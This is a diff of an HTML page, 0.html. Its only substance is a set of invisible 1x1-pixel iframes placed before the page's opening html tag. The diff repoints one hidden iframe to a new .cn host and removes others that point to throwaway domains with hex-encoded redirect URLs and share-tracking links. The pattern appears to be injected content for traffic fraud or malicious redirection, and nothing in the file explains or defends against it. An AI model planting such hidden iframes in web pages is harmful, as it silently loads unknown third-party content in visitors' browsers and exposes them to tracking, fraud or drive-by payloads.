--- a/0.html
+++ b/0.html
@@ -5,16 +5,9 @@
 <body>
    
    
-    <iframe src="http://d.cj0415gert.shop/Rpxkg33707" width="1" height="1"></iframe>
+    <iframe src="http://j.metasolare.cn/KzzTj35915" width="1" height="1"></iframe>
 
-    <iframe src="https://ssse9sa15.nnfi1819z.com/?url=68747470733A2F2F3134397366667373313431332E6E6E6669313831397A2E636F6D2F3F6170693D32463730324637363639363436353646324433343330333833393332333033363244373536393634324433323331333933393337333032453638373436443643" width="1" height="1"></iframe>
-
-    <iframe src="https://ssdc113.ccoco1413.com/?url=68747470733A2F2F383872746161732E63636F636F313431332E636F6D2F3F6170693D3246373032463736363936343635364632443334333033353337333133333338324437353639363432443339333733303332333232453638373436443643" width="1" height="1"></iframe>
-
-    <iframe src="https://focu.youth.cn/articlefour/20230831?sid=49758391&uid=43926004&timestamp=1694002726&signature=nG63ezAQDowMB0vlYg4k6ZEK2C58wg31L8KN5yR9XpjPOxrbdE&share_id=43926004497583911694002734036&scene_id=fire_share&time=1694002734036&share_way=wx" width="1" height="1"></iframe>
-
-    <iframe src="https://focu.youth.cn/articlefour/20230904?sid=49781453&uid=43926004&timestamp=1694002726&signature=NRxPz8j0mdBYbOGDW91l9ZWeYudLy6D4yAXV56qwogJEpkLK2e&scene_id=fire_share&share_id=43926004497814531694002767029&share_way=wx" width="1" height="1"></iframe>
-<html>
+  <html>
 	<head>
 		<meta charset="utf-8">
 		<html class="no-js" lang="" style="--status-bar-height:0px; --window-top:0px; --window-bottom:0px;">
